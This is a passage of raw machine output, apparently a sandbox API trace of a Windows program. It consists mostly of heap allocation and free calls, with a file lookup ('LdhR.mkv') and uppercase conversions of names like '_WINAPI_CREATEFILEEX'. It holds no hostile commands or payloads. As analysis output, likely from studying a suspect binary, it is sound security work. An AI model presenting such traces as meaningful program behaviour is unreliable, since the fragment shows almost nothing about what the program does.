ftCreationTime.dwHighDateTime=0x1d5ebdf, ftLastAccessTime.dwLowDateTime=0x31578900, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x31578900, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="LdhR.mkv", cAlternateFileName="")) returned 0x41ac100 [0124.030] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0124.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0124.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0124.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0124.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0124.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0124.032] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0124.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0124.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0124.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0124.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0124.033] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0124.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0124.033] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0124.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0124.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0124.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0124.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0124.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0124.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0124.036] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0124.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0124.038] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 